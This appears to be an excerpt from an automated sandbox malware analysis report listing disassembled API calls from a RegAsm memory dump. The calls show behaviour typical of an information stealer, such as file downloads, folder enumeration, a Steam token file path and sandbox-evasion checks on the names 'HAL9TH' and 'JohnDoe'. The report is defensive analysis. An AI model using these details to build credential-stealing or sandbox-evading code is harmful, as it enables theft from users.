                                                                                                                                                                                                                                                              • API String ID: 3676486918-0
                                                                                                                                                                                                                                                              • Opcode ID: 9faebf2de75bf63b99fbadaceea92aed034a018285eddf57d64b14fdac7aec56
                                                                                                                                                                                                                                                              • Instruction ID: 59302f8f08e84b6e53205e23179ccb4f2d667525b456669fd9439546fa12dc8f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9faebf2de75bf63b99fbadaceea92aed034a018285eddf57d64b14fdac7aec56
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A6F05E76640204FFEB149FA1EC0EFAE7A7EEB84B04F101025FB01A61A0D7B19911DBA4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00410873
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,?,?,00424684,?,?,?,00000000,?,?,00424680,?,?,?), ref: 00410FD0
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00404D92: _EH_prolog.MSVCRT ref: 00404D97
                                                                                                                                                                                                                                                                • Part of subcall function 00404D92: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404DE6
                                                                                                                                                                                                                                                                • Part of subcall function 00404D92: StrCmpCA.SHLWAPI(?), ref: 00404E00
                                                                                                                                                                                                                                                                • Part of subcall function 00404D92: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E24
                                                                                                                                                                                                                                                                • Part of subcall function 00404D92: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404E45
                                                                                                                                                                                                                                                                • Part of subcall function 00404D92: InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404E90
                                                                                                                                                                                                                                                                • Part of subcall function 00404D92: CloseHandle.KERNEL32(?,?,00000400), ref: 00404EAA
                                                                                                                                                                                                                                                                • Part of subcall function 00404D92: InternetCloseHandle.WININET(00000000), ref: 00404EB1
                                                                                                                                                                                                                                                                • Part of subcall function 00404D92: InternetCloseHandle.WININET(?), ref: 00404EBA
                                                                                                                                                                                                                                                                • Part of subcall function 00404D92: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00404E6C
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prologInternetlstrcpy$CloseFileHandle$CreateOpenlstrcat$DirectoryReadWritelstrlen
                                                                                                                                                                                                                                                              • String ID: E
                                                                                                                                                                                                                                                              • API String ID: 2172055965-3568589458
                                                                                                                                                                                                                                                              • Opcode ID: 4c0029da599ed2ac816204df3927d9b291426cbf73a4ffcbe4c4b9897c5ed7a5
                                                                                                                                                                                                                                                              • Instruction ID: c4efe4efdfaad88b00d563889e55045131ebd4388e9f9190f6b0678513af584d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c0029da599ed2ac816204df3927d9b291426cbf73a4ffcbe4c4b9897c5ed7a5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26626C31801288EADF05EBE6D955BDCBFB46F29308F1444AEE445732C2DB781B18DB66
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00413076
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,004244AF), ref: 004130C7
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023
                                                                                                                                                                                                                                                                • Part of subcall function 004010D8: _EH_prolog.MSVCRT ref: 004010DD
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • Soft\Steam\steam_tokens.txt, xrefs: 004130DF
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prolog$lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                                                                                                                              • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                                                                                                              • API String ID: 40794102-3507145866
                                                                                                                                                                                                                                                              • Opcode ID: 743da76c2615ec201a4711821d8736523bc6ee0fb9830f4043c332e24f7c49bd
                                                                                                                                                                                                                                                              • Instruction ID: 314a9d3dfb88439be04f93f4e9330820655916160995adde9920049028c6f92b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 743da76c2615ec201a4711821d8736523bc6ee0fb9830f4043c332e24f7c49bd
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BD213B71800158AACF04FBE6C956BDDBB78AF19308F10856EE411732D2DB782719CA6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 0040E683: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,0040104D,HAL9TH,00415B49), ref: 0040E68F
                                                                                                                                                                                                                                                                • Part of subcall function 0040E683: HeapAlloc.KERNEL32(00000000,?,?,0040104D,HAL9TH,00415B49), ref: 0040E696
                                                                                                                                                                                                                                                                • Part of subcall function 0040E683: GetComputerNameA.KERNEL32(00000000,?), ref: 0040E6AA
                                                                                                                                                                                                                                                                • Part of subcall function 0040E651: GetProcessHeap.KERNEL32(00000000,00000104,00000000,HAL9TH,?,00401063,JohnDoe,00415B49), ref: 0040E65D
                                                                                                                                                                                                                                                                • Part of subcall function 0040E651: HeapAlloc.KERNEL32(00000000,?,00401063,JohnDoe,00415B49), ref: 0040E664
                                                                                                                                                                                                                                                                • Part of subcall function 0040E651: GetUserNameA.ADVAPI32(00000000,?), ref: 0040E678
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401070
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                                                                                                                                                                                              • String ID: HAL9TH$JohnDoe
                                                                                                                                                                                                                                                              • API String ID: 1004333139-3469431008
                                                                                                                                                                                                                                                              • Opcode ID: c325a229e93f0b281faee4112369322461e72d20a9d288c4c314f514dd301ac1
                                                                                                                                                                                                                                                              • Instruction ID: 2ef834e29eece2a673e7f1ed4b69fc1af26aeea72df36d94ee3d5202348ae326
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c325a229e93f0b281faee4112369322461e72d20a9d288c4c314f514dd301ac1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97D05E61A8474210ED3436B2780AD1612884C20768360093BB002F19C6ED7E8490006C
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040714C
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00407383
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00407397
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023
                                                                                                                                                                                                                                                                • Part of subcall function 004010D8: _EH_prolog.MSVCRT ref: 004010DD
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3193997572-0
                                                                                                                                                                                                                                                              • Opcode ID: 686b5e08ec1518f19b5cfc0172cce503a6c00adae9226d5b486b1620cefd56ba
                                                                                                                                                                                                                                                              • Instruction ID: 2db634f6e4f8391188817ca8b70ad80a656b740c6967db4882bbb68c6e89a19d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 686b5e08ec1518f19b5cfc0172cce503a6c00adae9226d5b486b1620cefd56ba
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34A18431804148EADF09EBE6D955BDDBBB4AF18308F54446EF405732C2DB782B18DB26
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 00414F29
                                                                                                                                                                                                                                                                • Part of subcall function 0040F7A3: SHGetFolderPathA.SHELL32(00000000,O<B,00000000,00000000,?), ref: 0040F7D4
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00414F6B
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 00414F8A
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: _EH_prolog.MSVCRT ref: 00414CCC
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: wsprintfA.USER32 ref: 00414CEB
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: FindFirstFileA.KERNEL32(?,?), ref: 00414D02
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: StrCmpCA.SHLWAPI(?,00424818), ref: 00414D1F
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: StrCmpCA.SHLWAPI(?,0042481C), ref: 00414D39
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: wsprintfA.USER32 ref: 00414D5D
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: StrCmpCA.SHLWAPI(?,0042447E), ref: 00414D6E
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: wsprintfA.USER32 ref: 00414D8B
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: PathMatchSpecA.SHLWAPI(?,?), ref: 00414DB2
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: lstrcat.KERNEL32(?,?), ref: 00414DDE
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: lstrcat.KERNEL32(?,00424834), ref: 00414DF0
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: lstrcat.KERNEL32(?,?), ref: 00414E00
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: lstrcat.KERNEL32(?,00424838), ref: 00414E12
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: lstrcat.KERNEL32(?,?), ref: 00414E26
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: wsprintfA.USER32 ref: 00414D9F
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: FindNextFileA.KERNEL32(00000000,?), ref: 00414EF6
                                                                                                                                                                                                                                                                • Part of subcall function 00414CC7: FindClose.KERNEL32(00000000), ref: 00414F05
                                                                                                                                                                                                                                                                • Part of subcall function 004010D8: _EH_prolog.MSVCRT ref: 004010DD
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$H_prologwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 25485560-0
                                                                                                                                                                                                                                                              • Opcode ID: 76738d678de347eee2deda178e4cc8441fbec7177bde9d722b48a22d7cd4c949
                                                                                                                                                                                                                                                              • Instruction ID: 8b11b13a94d00ed0da9b1ac4add6904c7d1a8df66ed18ef339ef0f3182ba5d39
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76738d678de347eee2deda178e4cc8441fbec7177bde9d722b48a22d7cd4c949
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5741B171D00119ABCF10EFA1DC46EED7B79FF48314F00066AF940A2161E73997698B95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00413480), ref: 0040FA9B
                                                                                                                                                                                                                                                              • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0040FAB6
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040FABD
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3183270410-0
                                                                                                                                                                                                                                                              • Opcode ID: f8103156aad628352d265fe4394452c368a59e008b91e0c9a691aedd6324bf5a
                                                                                                                                                                                                                                                              • Instruction ID: 9fa8da15bc1bd996d1c6d90f9597c2e1419af83dcafec2f5f0315d7c757bc199
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8103156aad628352d265fe4394452c368a59e008b91e0c9a691aedd6324bf5a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52F03076901228BBDB20AB50DC09FD97B69AF04755F004061FA45A61D0DBB49A848BD8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,0040104D,HAL9TH,00415B49), ref: 0040E68F
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,0040104D,HAL9TH,00415B49), ref: 0040E696
                                                                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(00000000,?), ref: 0040E6AA
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4203777966-0
                                                                                                                                                                                                                                                              • Opcode ID: b83d286ff64a099836f19afa592c91b9195e3a8c7a744618c8208ad52fbd73d1
                                                                                                                                                                                                                                                              • Instruction ID: 557862b87a92863bd0aefa927051c0b0989c03f65f9f1febeffc8aa881e0f0b8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b83d286ff64a099836f19afa592c91b9195e3a8c7a744618c8208ad52fbd73d1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FBE08CB1700204ABE7109BAAAC0DF9AB6ECEB84745F400036F602D2291DAB489018628
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040A815
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040F7A3: SHGetFolderPathA.SHELL32(00000000,O<B,00000000,00000000,?), ref: 0040F7D4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
